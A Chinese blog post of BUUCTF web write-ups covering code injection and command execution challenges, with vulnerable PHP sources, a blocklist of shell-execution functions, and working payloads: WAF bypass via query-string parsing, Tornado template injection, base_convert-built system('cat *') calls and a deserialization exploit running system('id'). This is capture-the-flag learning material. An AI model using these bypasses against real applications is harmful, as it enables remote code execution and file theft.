本篇博客主要介绍了buuctf上web部分代码注入和命令执行相关题目的writeup!持续更新中!

[RoarCTF 2019]Easy Calc

writeup

打开查看源码发现是通过GET请求calc.php来获取答案的,直接访问能看到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>

先介绍一下PHP的字符串解析特性,PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  1. 删除空白符
  2. 将某些字符转换为下划线(包括空格)

以这题为例,我们可以用类似下面的payload来绕过waf,waf在哪?我也不知道,刚开始我以为是用php写的waf,找了好久没找到,后来看大佬们的博客才发现并不是

waf可能不允许传递传递的num参数的值有字母,我们就可以用%20num来传递,这样waf那边解析的就是%20num这个参数,而在php那里解析的就是num这个参数

1
calc.php?%20num=

所以我们可以找一下flag文件位置,查看flag

1
2
3
calc.php?%20num=var_dump(scandir(chr(47)))	#查看flag位置

calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) #读flag

我们还可以利用无参数函数来构造payload

还可以用http走私来构造,具体参见:https://www.moonback.xyz/2020/01/17/http走私学习/[](https://www.moonback.xyz/2020/01/17/http走私学习/)

我们就可以构造这种,在请求头里加上下面内容,并加上几个回车

1
2
3
4
Transfer-Encoding: chunked



参考:

http://62.234.60.226/2019/10/19/RoarCTF-wp.html

[护网杯 2018]easy_tornado

writeup

打开题目发现三个文件,flag.txt提示flag在/fllllllllllllagwelcome.txt提示renderhints.txt提示md5(cookie_secret+md5(filename)),结合题目名字,联想到python中的tornado框架render模板注入

cookie_secret存放在handler.settings中,因此我们可以读取出cookie_secret,payload:

1
error?msg={{handler.settings}}

发现成功读取到cookie_secret,按照提示给的格式读取flag

1
2
3
4
<?php
$cookie_secret='a33e0b4f-63b4-4ede-90b5-cc7bb45f48ca';
$filename='/fllllllllllllag';
echo md5($cookie_secret.md5($filename));

尝试访问,得到flag

1
file?filename=/fllllllllllllag&filehash=8089e3218f80b4c12a208cc0e9974d98

[CISCN 2019 初赛]Love Math

writeup

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 <?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
//帮你算出答案
eval('echo '.$content.';');
}

php转字符串最常用的函数hex2bin发现不在白名单 但是我们可以尝试构造一个 发现了

image-20201016200948802

构造流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

echo base_convert("hex2bin",36,10)."\n";
echo base_convert(37907361743,10,36)."\n";
echo bin2hex("_GET")."\n";
echo hex2bin('5f474554')."\n";
echo hexdec('5f474554')."\n";
echo dechex(1598506324)."\n";
echo hex2bin(dechex(1598506324))."\n";

echo base_convert(37907361743,10,36)(dechex(1598506324));

// $pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){1}(($$pi){2})

还有其他payload:

1
2
$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})
// exec(getallheaders(){1})

image-20201016205940938

1
2
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
// system('cat *')

一个fuzz脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
error_reporting(0);
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
for($i = 0;$i < 9; $i++){
for($j = 0;$j <=9;$j++){
$exp = $payload[$k] ^ $i.$j;
echo($payload[$k]."^$i$j"."==>$exp");
echo "\n";
}
}
}

[网鼎杯 2020 朱雀组]phpweb

writeup

命名空间绕过所有限制 源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>

或者反序列化

image-20201016194646545

exp:

1
2
3
4
5
6
7
<?php
class Test {
var $p = "id";
var $func = "system";
}
$a =new Test;
echo serialize($a);

参考:

https://www.cnblogs.com/20175211lyz/p/11588219.html

评论